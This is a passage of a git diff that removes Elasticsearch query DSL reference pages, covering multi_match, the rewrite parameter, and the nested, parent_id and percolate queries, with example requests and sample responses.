that must match. -The syntax is the same as the <>. -(Defaults to `"30%"`). - -`fail_on_unsupported_field`:: -Controls whether the query should fail (throw an exception) if any of the -specified fields are not of the supported types -(`text` or `keyword`). Set this to `false` to ignore the field and continue -processing. Defaults to `true`. - -`boost_terms`:: -Each term in the formed query could be further boosted by their tf-idf score. -This sets the boost factor to use when using this feature. Defaults to -deactivated (`0`). Any other positive value activates terms boosting with the -given boost factor. - -`include`:: -Specifies whether the input documents should also be included in the search -results returned. Defaults to `false`. - -`boost`:: -Sets the boost value of the whole query. Defaults to `1.0`. - -==== Alternative -To take more control over the construction of a query for similar documents it is worth considering writing custom client code to assemble selected terms from an example document into a Boolean query with the desired settings. The logic in `more_like_this` that selects "interesting" words from a piece of text is also accessible via the <>. For example, using the termvectors API it would be possible to present users with a selection of topical keywords found in a document's text, allowing them to select words of interest to drill down on, rather than using the more "black-box" approach of matching used by `more_like_this`. diff --git a/docs/reference/query-dsl/multi-match-query.asciidoc b/docs/reference/query-dsl/multi-match-query.asciidoc deleted file mode 100644 index c5b3943f5be..00000000000 --- a/docs/reference/query-dsl/multi-match-query.asciidoc +++ /dev/null @@ -1,552 +0,0 @@ -[[query-dsl-multi-match-query]] -=== Multi-match query -++++ -Multi-match -++++ - -The `multi_match` query builds on the <> -to allow multi-field queries: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query": "this is a test", <1> - "fields": [ "subject", "message" ] <2> - } - } -} --------------------------------------------------- - -<1> The query string. -<2> The fields to be queried. - -[discrete] -[[field-boost]] -==== `fields` and per-field boosting - -Fields can be specified with wildcards, eg: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query": "Will Smith", - "fields": [ "title", "*_name" ] <1> - } - } -} --------------------------------------------------- - -<1> Query the `title`, `first_name` and `last_name` fields. - -Individual fields can be boosted with the caret (`^`) notation: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query" : "this is a test", - "fields" : [ "subject^3", "message" ] <1> - } - } -} --------------------------------------------------- - -<1> The query multiplies the `subject` field's score by three but leaves the -`message` field's score unchanged. - -If no `fields` are provided, the `multi_match` query defaults to the `index.query.default_field` -index settings, which in turn defaults to `*`. `*` extracts all fields in the mapping that -are eligible to term queries and filters the metadata fields. All extracted fields are then -combined to build a query. - -WARNING: There is a limit on the number of fields that can be queried -at once. It is defined by the `indices.query.bool.max_clause_count` <> -which defaults to 1024. - -[[multi-match-types]] -[discrete] -==== Types of `multi_match` query: - -The way the `multi_match` query is executed internally depends on the `type` -parameter, which can be set to: - -[horizontal] -`best_fields`:: (*default*) Finds documents which match any field, but - uses the `_score` from the best field. See <>. - -`most_fields`:: Finds documents which match any field and combines - the `_score` from each field. See <>. - -`cross_fields`:: Treats fields with the same `analyzer` as though they - were one big field. Looks for each word in *any* - field. See <>. - -`phrase`:: Runs a `match_phrase` query on each field and uses the `_score` - from the best field. See <>. - -`phrase_prefix`:: Runs a `match_phrase_prefix` query on each field and uses - the `_score` from the best field. See <>. - -`bool_prefix`:: Creates a `match_bool_prefix` query on each field and - combines the `_score` from each field. See - <>. - -[[type-best-fields]] -==== `best_fields` - -The `best_fields` type is most useful when you are searching for multiple -words best found in the same field. For instance ``brown fox'' in a single -field is more meaningful than ``brown'' in one field and ``fox'' in the other. - -The `best_fields` type generates a <> for -each field and wraps them in a <> query, to -find the single best matching field. For instance, this query: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query": "brown fox", - "type": "best_fields", - "fields": [ "subject", "message" ], - "tie_breaker": 0.3 - } - } -} --------------------------------------------------- - -would be executed as: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "dis_max": { - "queries": [ - { "match": { "subject": "brown fox" }}, - { "match": { "message": "brown fox" }} - ], - "tie_breaker": 0.3 - } - } -} --------------------------------------------------- - -Normally the `best_fields` type uses the score of the *single* best matching -field, but if `tie_breaker` is specified, then it calculates the score as -follows: - - * the score from the best matching field - * plus `tie_breaker * _score` for all other matching fields - -Also, accepts `analyzer`, `boost`, `operator`, `minimum_should_match`, -`fuzziness`, `lenient`, `prefix_length`, `max_expansions`, `fuzzy_rewrite`, `zero_terms_query`, - `cutoff_frequency`, `auto_generate_synonyms_phrase_query` and `fuzzy_transpositions`, - as explained in <>. - -[IMPORTANT] -[[operator-min]] -.`operator` and `minimum_should_match` -=================================================== - -The `best_fields` and `most_fields` types are _field-centric_ -- they generate -a `match` query *per field*. This means that the `operator` and -`minimum_should_match` parameters are applied to each field individually, -which is probably not what you want. - -Take this query for example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query": "Will Smith", - "type": "best_fields", - "fields": [ "first_name", "last_name" ], - "operator": "and" <1> - } - } -} --------------------------------------------------- - -<1> All terms must be present. - -This query is executed as: - - (+first_name:will +first_name:smith) - | (+last_name:will +last_name:smith) - -In other words, *all terms* must be present *in a single field* for a document -to match. - -See <> for a better solution. - -=================================================== - -[[type-most-fields]] -==== `most_fields` - -The `most_fields` type is most useful when querying multiple fields that -contain the same text analyzed in different ways. For instance, the main -field may contain synonyms, stemming and terms without diacritics. A second -field may contain the original terms, and a third field might contain -shingles. By combining scores from all three fields we can match as many -documents as possible with the main field, but use the second and third fields -to push the most similar results to the top of the list. - -This query: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query": "quick brown fox", - "type": "most_fields", - "fields": [ "title", "title.original", "title.shingles" ] - } - } -} --------------------------------------------------- - -would be executed as: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool": { - "should": [ - { "match": { "title": "quick brown fox" }}, - { "match": { "title.original": "quick brown fox" }}, - { "match": { "title.shingles": "quick brown fox" }} - ] - } - } -} --------------------------------------------------- - -The score from each `match` clause is added together, then divided by the -number of `match` clauses. - -Also, accepts `analyzer`, `boost`, `operator`, `minimum_should_match`, -`fuzziness`, `lenient`, `prefix_length`, `max_expansions`, `fuzzy_rewrite`, `zero_terms_query` -and `cutoff_frequency`, as explained in <>, but -*see <>*. - -[[type-phrase]] -==== `phrase` and `phrase_prefix` - -The `phrase` and `phrase_prefix` types behave just like <>, -but they use a `match_phrase` or `match_phrase_prefix` query instead of a -`match` query. - -This query: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query": "quick brown f", - "type": "phrase_prefix", - "fields": [ "subject", "message" ] - } - } -} --------------------------------------------------- - -would be executed as: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "dis_max": { - "queries": [ - { "match_phrase_prefix": { "subject": "quick brown f" }}, - { "match_phrase_prefix": { "message": "quick brown f" }} - ] - } - } -} --------------------------------------------------- - -Also, accepts `analyzer`, <>, `lenient` and `zero_terms_query` as explained -in <>, as well as `slop` which is explained in <>. -Type `phrase_prefix` additionally accepts `max_expansions`. - -[IMPORTANT] -[[phrase-fuzziness]] -.`phrase`, `phrase_prefix` and `fuzziness` -=================================================== -The `fuzziness` parameter cannot be used with the `phrase` or `phrase_prefix` type. -=================================================== - -[[type-cross-fields]] -==== `cross_fields` - -The `cross_fields` type is particularly useful with structured documents where -multiple fields *should* match. For instance, when querying the `first_name` -and `last_name` fields for ``Will Smith'', the best match is likely to have -``Will'' in one field and ``Smith'' in the other. - -**** - -This sounds like a job for <> but there are two problems -with that approach. The first problem is that `operator` and -`minimum_should_match` are applied per-field, instead of per-term (see -<>). - -The second problem is to do with relevance: the different term frequencies in -the `first_name` and `last_name` fields can produce unexpected results. - -For instance, imagine we have two people: ``Will Smith'' and ``Smith Jones''. -``Smith'' as a last name is very common (and so is of low importance) but -``Smith'' as a first name is very uncommon (and so is of great importance). - -If we do a search for ``Will Smith'', the ``Smith Jones'' document will -probably appear above the better matching ``Will Smith'' because the score of -`first_name:smith` has trumped the combined scores of `first_name:will` plus -`last_name:smith`. - -**** - -One way of dealing with these types of queries is simply to index the -`first_name` and `last_name` fields into a single `full_name` field. Of -course, this can only be done at index time. - -The `cross_field` type tries to solve these problems at query time by taking a -_term-centric_ approach. It first analyzes the query string into individual -terms, then looks for each term in any of the fields, as though they were one -big field. - -A query like: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query": "Will Smith", - "type": "cross_fields", - "fields": [ "first_name", "last_name" ], - "operator": "and" - } - } -} --------------------------------------------------- - -is executed as: - - +(first_name:will last_name:will) - +(first_name:smith last_name:smith) - -In other words, *all terms* must be present *in at least one field* for a -document to match. (Compare this to -<>.) - -That solves one of the two problems. The problem of differing term frequencies -is solved by _blending_ the term frequencies for all fields in order to even -out the differences. - -In practice, `first_name:smith` will be treated as though it has the same -frequencies as `last_name:smith`, plus one. This will make matches on -`first_name` and `last_name` have comparable scores, with a tiny advantage -for `last_name` since it is the most likely field that contains `smith`. - -Note that `cross_fields` is usually only useful on short string fields -that all have a `boost` of `1`. Otherwise boosts, term freqs and length -normalization contribute to the score in such a way that the blending of term -statistics is not meaningful anymore. - -If you run the above query through the <>, it returns this -explanation: - - +blended("will", fields: [first_name, last_name]) - +blended("smith", fields: [first_name, last_name]) - -Also, accepts `analyzer`, `boost`, `operator`, `minimum_should_match`, -`lenient`, `zero_terms_query` and `cutoff_frequency`, as explained in -<>. - -[[cross-field-analysis]] -===== `cross_field` and analysis - -The `cross_field` type can only work in term-centric mode on fields that have -the same analyzer. Fields with the same analyzer are grouped together as in -the example above. If there are multiple groups, they are combined with a -`bool` query. - -For instance, if we have a `first` and `last` field which have -the same analyzer, plus a `first.edge` and `last.edge` which -both use an `edge_ngram` analyzer, this query: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query": "Jon", - "type": "cross_fields", - "fields": [ - "first", "first.edge", - "last", "last.edge" - ] - } - } -} --------------------------------------------------- - -would be executed as: - - blended("jon", fields: [first, last]) - | ( - blended("j", fields: [first.edge, last.edge]) - blended("jo", fields: [first.edge, last.edge]) - blended("jon", fields: [first.edge, last.edge]) - ) - -In other words, `first` and `last` would be grouped together and -treated as a single field, and `first.edge` and `last.edge` would be -grouped together and treated as a single field. - -Having multiple groups is fine, but when combined with `operator` or -`minimum_should_match`, it can suffer from the <> -as `most_fields` or `best_fields`. - -You can easily rewrite this query yourself as two separate `cross_fields` -queries combined with a `bool` query, and apply the `minimum_should_match` -parameter to just one of them: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool": { - "should": [ - { - "multi_match" : { - "query": "Will Smith", - "type": "cross_fields", - "fields": [ "first", "last" ], - "minimum_should_match": "50%" <1> - } - }, - { - "multi_match" : { - "query": "Will Smith", - "type": "cross_fields", - "fields": [ "*.edge" ] - } - } - ] - } - } -} --------------------------------------------------- - -<1> Either `will` or `smith` must be present in either of the `first` - or `last` fields - -You can force all fields into the same group by specifying the `analyzer` -parameter in the query. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query": "Jon", - "type": "cross_fields", - "analyzer": "standard", <1> - "fields": [ "first", "last", "*.edge" ] - } - } -} --------------------------------------------------- - -<1> Use the `standard` analyzer for all fields. - -which will be executed as: - - blended("will", fields: [first, first.edge, last.edge, last]) - blended("smith", fields: [first, first.edge, last.edge, last]) - -[[tie-breaker]] -===== `tie_breaker` - -By default, each per-term `blended` query will use the best score returned by -any field in a group, then these scores are added together to give the final -score. The `tie_breaker` parameter can change the default behaviour of the -per-term `blended` queries. It accepts: - -[horizontal] -`0.0`:: Take the single best score out of (eg) `first_name:will` - and `last_name:will` (*default* for all `multi_match` - query types except `bool_prefix` and `most_fields`) -`1.0`:: Add together the scores for (eg) `first_name:will` and - `last_name:will` (*default* for the `bool_prefix` and - `most_fields` `multi_match` query types) -`0.0 < n < 1.0`:: Take the single best score plus +tie_breaker+ multiplied - by each of the scores from other matching fields. - -[IMPORTANT] -[[crossfields-fuzziness]] -.`cross_fields` and `fuzziness` -=================================================== -The `fuzziness` parameter cannot be used with the `cross_fields` type. -=================================================== - -[[type-bool-prefix]] -==== `bool_prefix` - -The `bool_prefix` type's scoring behaves like <>, but using a -<> instead of a -`match` query. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query": "quick brown f", - "type": "bool_prefix", - "fields": [ "subject", "message" ] - } - } -} --------------------------------------------------- - -The `analyzer`, `boost`, `operator`, `minimum_should_match`, `lenient`, -`zero_terms_query`, and `auto_generate_synonyms_phrase_query` parameters as -explained in <> are supported. The -`fuzziness`, `prefix_length`, `max_expansions`, `fuzzy_rewrite`, and -`fuzzy_transpositions` parameters are supported for the terms that are used to -construct term queries, but do not have an effect on the prefix query -constructed from the final term. - -The `slop` and `cutoff_frequency` parameters are not supported by this query -type. diff --git a/docs/reference/query-dsl/multi-term-rewrite.asciidoc b/docs/reference/query-dsl/multi-term-rewrite.asciidoc deleted file mode 100644 index fe415f4eb5b..00000000000 --- a/docs/reference/query-dsl/multi-term-rewrite.asciidoc +++ /dev/null @@ -1,109 +0,0 @@ -[[query-dsl-multi-term-rewrite]] -== `rewrite` parameter - -WARNING: This parameter is for expert users only. Changing the value of -this parameter can impact search performance and relevance. - -{es} uses https://lucene.apache.org/core/[Apache Lucene] internally to power -indexing and searching. In their original form, Lucene cannot execute the -following queries: - -* <> -* <> -* <> -* <> -* <> - -To execute them, Lucene changes these queries to a simpler form, such as a -<> or a -{wikipedia}/Bit_array[bit set]. - -The `rewrite` parameter determines: - -* How Lucene calculates the relevance scores for each matching document -* Whether Lucene changes the original query to a `bool` -query or bit set -* If changed to a `bool` query, which `term` query clauses are included - -[discrete] -[[rewrite-param-valid-values]] -=== Valid values - -`constant_score` (Default):: -Uses the `constant_score_boolean` method for fewer matching terms. Otherwise, -this method finds all matching terms in sequence and returns matching documents -using a bit set. - -`constant_score_boolean`:: -Assigns each document a relevance score equal to the `boost` -parameter. -+ -This method changes the original query to a <>. This `bool` query contains a `should` clause and -<> for each matching term. -+ -This method can cause the final `bool` query to exceed the clause limit in the -<> -setting. If the query exceeds this limit, {es} returns an error. - -`scoring_boolean`:: -Calculates a relevance score for each matching document. -+ -This method changes the original query to a <>. This `bool` query contains a `should` clause and -<> for each matching term. -+ -This method can cause the final `bool` query to exceed the clause limit in the -<> -setting. If the query exceeds this limit, {es} returns an error. - -`top_terms_blended_freqs_N`:: -Calculates a relevance score for each matching document as if all terms had the -same frequency. This frequency is the maximum frequency of all matching terms. -+ -This method changes the original query to a <>. This `bool` query contains a `should` clause and -<> for each matching term. -+ -The final `bool` query only includes `term` queries for the top `N` scoring -terms. -+ -You can use this method to avoid exceeding the clause limit in the -<> -setting. - -`top_terms_boost_N`:: -Assigns each matching document a relevance score equal to the `boost` parameter. -+ -This method changes the original query to a <>. This `bool` query contains a `should` clause and -<> for each matching term. -+ -The final `bool` query only includes `term` queries for the top `N` terms. -+ -You can use this method to avoid exceeding the clause limit in the -<> -setting. - -`top_terms_N`:: -Calculates a relevance score for each matching document. -+ -This method changes the original query to a <>. This `bool` query contains a `should` clause and -<> for each matching term. -+ -The final `bool` query -only includes `term` queries for the top `N` scoring terms. -+ -You can use this method to avoid exceeding the clause limit in the -<> -setting. - -[discrete] -[[rewrite-param-perf-considerations]] -=== Performance considerations for the `rewrite` parameter -For most uses, we recommend using the `constant_score`, -`constant_score_boolean`, or `top_terms_boost_N` rewrite methods. - -Other methods calculate relevance scores. These score calculations are often -expensive and do not improve query results. \ No newline at end of file diff --git a/docs/reference/query-dsl/nested-query.asciidoc b/docs/reference/query-dsl/nested-query.asciidoc deleted file mode 100644 index 853e1012bcf..00000000000 --- a/docs/reference/query-dsl/nested-query.asciidoc +++ /dev/null @@ -1,276 +0,0 @@ -[[query-dsl-nested-query]] -=== Nested query -++++ -Nested -++++ - -Wraps another query to search <> fields. - -The `nested` query searches nested field objects as if they were indexed as -separate documents. If an object matches the search, the `nested` query returns -the root parent document. - -[[nested-query-ex-request]] -==== Example request - -[[nested-query-index-setup]] -===== Index setup - -To use the `nested` query, your index must include a <> field -mapping. For example: - -[source,console] ----- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "obj1": { - "type": "nested" - } - } - } -} - ----- - -[[nested-query-ex-query]] -===== Example query - -[source,console] ----- -GET /my-index-000001/_search -{ - "query": { - "nested": { - "path": "obj1", - "query": { - "bool": { - "must": [ - { "match": { "obj1.name": "blue" } }, - { "range": { "obj1.count": { "gt": 5 } } } - ] - } - }, - "score_mode": "avg" - } - } -} ----- -// TEST[continued] - -[[nested-top-level-params]] -==== Top-level parameters for `nested` - -`path`:: -(Required, string) Path to the nested object you wish to search. - -`query`:: -+ --- -(Required, query object) Query you wish to run on nested objects in the `path`. -If an object matches the search, the `nested` query returns the root parent -document. - -You can search nested fields using dot notation that includes the complete path, -such as `obj1.name`. - -Multi-level nesting is automatically supported, and detected, resulting in an -inner nested query to automatically match the relevant nesting level, rather -than root, if it exists within another nested query. - -See <> for an example. --- - -`score_mode`:: -+ --- -(Optional, string) Indicates how scores for matching child objects affect the -root parent document's <>. Valid values -are: - -`avg` (Default):: -Use the mean relevance score of all matching child objects. - -`max`:: -Uses the highest relevance score of all matching child objects. - -`min`:: -Uses the lowest relevance score of all matching child objects. - -`none`:: -Do not use the relevance scores of matching child objects. The query assigns -parent documents a score of `0`. - -`sum`:: -Add together the relevance scores of all matching child objects. --- - -`ignore_unmapped`:: -+ --- -(Optional, Boolean) Indicates whether to ignore an unmapped `path` and not -return any documents instead of an error. Defaults to `false`. - -If `false`, {es} returns an error if the `path` is an unmapped field. - -You can use this parameter to query multiple indices that may not contain the -field `path`. --- - -[[nested-query-notes]] -==== Notes - -[[multi-level-nested-query-ex]] -===== Multi-level nested queries - -To see how multi-level nested queries work, -first you need an index that has nested fields. -The following request defines mappings for the `drivers` index -with nested `make` and `model` fields. - -[source,console] ----- -PUT /drivers -{ - "mappings": { - "properties": { - "driver": { - "type": "nested", - "properties": { - "last_name": { - "type": "text" - }, - "vehicle": { - "type": "nested", - "properties": { - "make": { - "type": "text" - }, - "model": { - "type": "text" - } - } - } - } - } - } - } -} ----- - -Next, index some documents to the `drivers` index. - -[source,console] ----- -PUT /drivers/_doc/1 -{ - "driver" : { - "last_name" : "McQueen", - "vehicle" : [ - { - "make" : "Powell Motors", - "model" : "Canyonero" - }, - { - "make" : "Miller-Meteor", - "model" : "Ecto-1" - } - ] - } -} - -PUT /drivers/_doc/2?refresh -{ - "driver" : { - "last_name" : "Hudson", - "vehicle" : [ - { - "make" : "Mifune", - "model" : "Mach Five" - }, - { - "make" : "Miller-Meteor", - "model" : "Ecto-1" - } - ] - } -} ----- -// TEST[continued] - -You can now use a multi-level nested query -to match documents based on the `make` and `model` fields. - -[source,console] ----- -GET /drivers/_search -{ - "query": { - "nested": { - "path": "driver", - "query": { - "nested": { - "path": "driver.vehicle", - "query": { - "bool": { - "must": [ - { "match": { "driver.vehicle.make": "Powell Motors" } }, - { "match": { "driver.vehicle.model": "Canyonero" } } - ] - } - } - } - } - } - } -} ----- -// TEST[continued] - -The search request returns the following response: - -[source,console-result] ----- -{ - "took" : 5, - "timed_out" : false, - "_shards" : { - "total" : 1, - "successful" : 1, - "skipped" : 0, - "failed" : 0 - }, - "hits" : { - "total" : { - "value" : 1, - "relation" : "eq" - }, - "max_score" : 3.7349272, - "hits" : [ - { - "_index" : "drivers", - "_type" : "_doc", - "_id" : "1", - "_score" : 3.7349272, - "_source" : { - "driver" : { - "last_name" : "McQueen", - "vehicle" : [ - { - "make" : "Powell Motors", - "model" : "Canyonero" - }, - { - "make" : "Miller-Meteor", - "model" : "Ecto-1" - } - ] - } - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took" : 5/"took": $body.took/] diff --git a/docs/reference/query-dsl/parent-id-query.asciidoc b/docs/reference/query-dsl/parent-id-query.asciidoc deleted file mode 100644 index 8b573c08dcc..00000000000 --- a/docs/reference/query-dsl/parent-id-query.asciidoc +++ /dev/null @@ -1,112 +0,0 @@ -[[query-dsl-parent-id-query]] -=== Parent ID query -++++ -Parent ID -++++ - -Returns child documents <> to a specific parent document. -You can use a <> field mapping to create parent-child -relationships between documents in the same index. - -[[parent-id-query-ex-request]] -==== Example request - -[[parent-id-index-setup]] -===== Index setup -To use the `parent_id` query, your index must include a <> -field mapping. To see how you can set up an index for the `parent_id` query, try -the following example. - -. Create an index with a <> field mapping. -+ --- -[source,console] ----- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "my-join-field": { - "type": "join", - "relations": { - "my-parent": "my-child" - } - } - } - } -} - ----- -// TESTSETUP --- - -. Index a parent document with an ID of `1`. -+ --- -[source,console] ----- -PUT /my-index-000001/_doc/1?refresh -{ - "text": "This is a parent document.", - "my-join-field": "my-parent" -} ----- --- - -. Index a child document of the parent document. -+ --- -[source,console] ----- -PUT /my-index-000001/_doc/2?routing=1&refresh -{ - "text": "This is a child document.", - "my_join_field": { - "name": "my-child", - "parent": "1" - } -} ----- --- - -[[parent-id-query-ex-query]] -===== Example query - -The following search returns child documents for a parent document with an ID of -`1`. - -[source,console] ----- -GET /my-index-000001/_search -{ - "query": { - "parent_id": { - "type": "my-child", - "id": "1" - } - } -} ----- - -[[parent-id-top-level-params]] -==== Top-level parameters for `parent_id` - -`type`:: -(Required, string) Name of the child relationship mapped for the -<> field. - -`id`:: -(Required, string) ID of the parent document. The query will return child -documents of this parent document. - -`ignore_unmapped`:: -+ --- -(Optional, Boolean) Indicates whether to ignore an unmapped `type` and not -return any documents instead of an error. Defaults to `false`. - -If `false`, {es} returns an error if the `type` is unmapped. - -You can use this parameter to query multiple indices that may not contain the -`type`. --- diff --git a/docs/reference/query-dsl/percolate-query.asciidoc b/docs/reference/query-dsl/percolate-query.asciidoc deleted file mode 100644 index 64c0b904dad..00000000000 --- a/docs/reference/query-dsl/percolate-query.asciidoc +++ /dev/null @@ -1,701 +0,0 @@ -[[query-dsl-percolate-query]] -=== Percolate query -++++ -Percolate -++++ - -The `percolate` query can be used to match queries -stored in an index. The `percolate` query itself -contains the document that will be used as query -to match with the stored queries. - -[discrete] -=== Sample Usage - -Create an index with two fields: - -[source,console] --------------------------------------------------- -PUT /my-index-00001 -{ - "mappings": { - "properties": { - "message": { - "type": "text" - }, - "query": { - "type": "percolator" - } - } - } -} --------------------------------------------------- - -The `message` field is the field used to preprocess the document defined in -the `percolator` query before it gets indexed into a temporary index. - -The `query` field is used for indexing the query documents. It will hold a -json object that represents an actual Elasticsearch query. The `query` field -has been configured to use the <>. This field -type understands the query dsl and stores the query in such a way that it can be -used later on to match documents defined on the `percolate` query. - -Register a query in the percolator: - -[source,console] --------------------------------------------------- -PUT /my-index-00001/_doc/1?refresh -{ - "query": { - "match": { - "message": "bonsai tree" - } - } -} --------------------------------------------------- -// TEST[continued] - -Match a document to the registered percolator queries: - -[source,console] --------------------------------------------------- -GET /my-index-00001/_search -{ - "query": { - "percolate": { - "field": "query", - "document": { - "message": "A new bonsai tree in the office" - } - } - } -} --------------------------------------------------- -// TEST[continued] - -The above request will yield the following response: - -[source,console-result] --------------------------------------------------- -{ - "took": 13, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.26152915, - "hits": [ - { <1> - "_index": "my-index-00001", - "_type": "_doc", - "_id": "1", - "_score": 0.26152915, - "_source": { - "query": { - "match": { - "message": "bonsai tree" - } - } - }, - "fields" : { - "_percolator_document_slot" : [0] <2> - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 13,/"took": "$body.took",/] - -<1> The query with id `1` matches our document. -<2> The `_percolator_document_slot` field indicates which document has matched with this query. - Useful when percolating multiple document simultaneously. - -TIP: To provide a simple example, this documentation uses one index `my-index-00001` for both the percolate queries and documents. -This set-up can work well when there are just a few percolate queries registered. However, with heavier usage it is recommended -to store queries and documents in separate indices. Please see <> for more details. - -[discrete] -==== Parameters - -The following parameters are required when percolating a document: - -[horizontal] -`field`:: The field of type `percolator` that holds the indexed queries. This is a required parameter. -`name`:: The suffix to be used for the `_percolator_document_slot` field in case multiple `percolate` queries have been specified. - This is an optional parameter. -`document`:: The source of the document being percolated. -`documents`:: Like the `document` parameter, but accepts multiple documents via a json array. -`document_type`:: The type / mapping of the document being percolated. This parameter is deprecated and will be removed in Elasticsearch 8.0. - -Instead of specifying the source of the document being percolated, the source can also be retrieved from an already -stored document. The `percolate` query will then internally execute a get request to fetch that document. - -In that case the `document` parameter can be substituted with the following parameters: - -[horizontal] -`index`:: The index the document resides in. This is a required parameter. -`type`:: The type of the document to fetch. This parameter is deprecated and will be removed in Elasticsearch 8.0. -`id`:: The id of the document to fetch. This is a required parameter. -`routing`:: Optionally, routing to be used to fetch document to percolate. -`preference`:: Optionally, preference to be used to fetch document to percolate. -`version`:: Optionally, the expected version of the document to be fetched. - -[discrete] -==== Percolating in a filter context - -In case you are not interested in the score, better performance can be expected by wrapping -the percolator query in a `bool` query's filter clause or in a `constant_score` query: - -[source,console] --------------------------------------------------- -GET /my-index-00001/_search -{ - "query": { - "constant_score": { - "filter": { - "percolate": { - "field": "query", - "document": { - "message": "A new bonsai tree in the office" - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -At index time terms are extracted from the percolator query and the percolator -can often determine whether a query matches just by looking at those extracted -terms. However, computing scores requires to deserialize each matching query -and run it against the percolated document, which is a much more expensive -operation. Hence if computing scores is not required the `percolate` query -should be wrapped in a `constant_score` query or a `bool` query's filter clause. - -Note that the `percolate` query never gets cached by the query cache. - -[discrete] -==== Percolating multiple documents - -The `percolate` query can match multiple documents simultaneously with the indexed percolator queries. -Percolating multiple documents in a single request can improve performance as queries only need to be parsed and -matched once instead of multiple times. - -The `_percolator_document_slot` field that is being returned with each matched percolator query is important when percolating -multiple documents simultaneously. It indicates which documents matched with a particular percolator query. The numbers -correlate with the slot in the `documents` array specified in the `percolate` query. - -[source,console] --------------------------------------------------- -GET /my-index-00001/_search -{ - "query": { - "percolate": { - "field": "query", - "documents": [ <1> - { - "message": "bonsai tree" - }, - { - "message": "new tree" - }, - { - "message": "the office" - }, - { - "message": "office tree" - } - ] - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> The documents array contains 4 documents that are going to be percolated at the same time. - -[source,console-result] --------------------------------------------------- -{ - "took": 13, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.7093853, - "hits": [ - { - "_index": "my-index-00001", - "_type": "_doc", - "_id": "1", - "_score": 0.7093853, - "_source": { - "query": { - "match": { - "message": "bonsai tree" - } - } - }, - "fields" : { - "_percolator_document_slot" : [0, 1, 3] <1> - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 13,/"took": "$body.took",/] - -<1> The `_percolator_document_slot` indicates that the first, second and last documents specified in the `percolate` query - are matching with this query. - -[discrete] -==== Percolating an Existing Document - -In order to percolate a newly indexed document, the `percolate` query can be used. Based on the response -from an index request, the `_id` and other meta information can be used to immediately percolate the newly added -document. - -[discrete] -===== Example - -Based on the previous example. - -Index the document we want to percolate: - -[source,console] --------------------------------------------------- -PUT /my-index-00001/_doc/2 -{ - "message" : "A new bonsai tree in the office" -} --------------------------------------------------- -// TEST[continued] -Index response: - -[source,console-result] --------------------------------------------------- -{ - "_index": "my-index-00001", - "_type": "_doc", - "_id": "2", - "_version": 1, - "_shards": { - "total": 2, - "successful": 1, - "failed": 0 - }, - "result": "created", - "_seq_no" : 1, - "_primary_term" : 1 -} --------------------------------------------------- - -Percolating an existing document, using the index response as basis to build to new search request: - -[source,console] --------------------------------------------------- -GET /my-index-00001/_search -{ - "query": { - "percolate": { - "field": "query", - "index": "my-index-00001", - "id": "2", - "version": 1 <1> - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> The version is optional, but useful in certain cases. We can ensure that we are trying to percolate -the document we just have indexed. A change may be made after we have indexed, and if that is the -case the search request would fail with a version conflict error. - -The search response returned is identical as in the previous example. - -[discrete] -==== Percolate query and highlighting - -The `percolate` query is handled in a special way when it comes to highlighting. The queries hits are used -to highlight the document that is provided in the `percolate` query. Whereas with regular highlighting the query in -the search request is used to highlight the hits. - -[discrete] -===== Example - -This example is based on the mapping of the first example. - -Save a query: - -[source,console] --------------------------------------------------- -PUT /my-index-00001/_doc/3?refresh -{ - "query": { - "match": { - "message": "brown fox" - } - } -} --------------------------------------------------- -// TEST[continued] - -Save another query: - -[source,console] --------------------------------------------------- -PUT /my-index-00001/_doc/4?refresh -{ - "query": { - "match": { - "message": "lazy dog" - } - } -} --------------------------------------------------- -// TEST[continued] - -Execute a search request with the `percolate` query and highlighting enabled: - -[source,console] --------------------------------------------------- -GET /my-index-00001/_search -{ - "query": { - "percolate": { - "field": "query", - "document": { - "message": "The quick brown fox jumps over the lazy dog" - } - } - }, - "highlight": { - "fields": { - "message": {} - } - } -} --------------------------------------------------- -// TEST[continued] - -This will yield the following response. - -[source,console-result] --------------------------------------------------- -{ - "took": 7, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 2, - "relation": "eq" - }, - "max_score": 0.26152915, - "hits": [ - { - "_index": "my-index-00001", - "_type": "_doc", - "_id": "3", - "_score": 0.26152915, - "_source": { - "query": { - "match": { - "message": "brown fox" - } - } - }, - "highlight": { - "message": [ - "The quick brown fox jumps over the lazy dog" <1> - ] - }, - "fields" : { - "_percolator_document_slot" : [0] - } - }, - { - "_index": "my-index-00001", - "_type": "_doc", - "_id": "4", - "_score": 0.26152915, - "_source": { - "query": { - "match": { - "message": "lazy dog" - } - } - 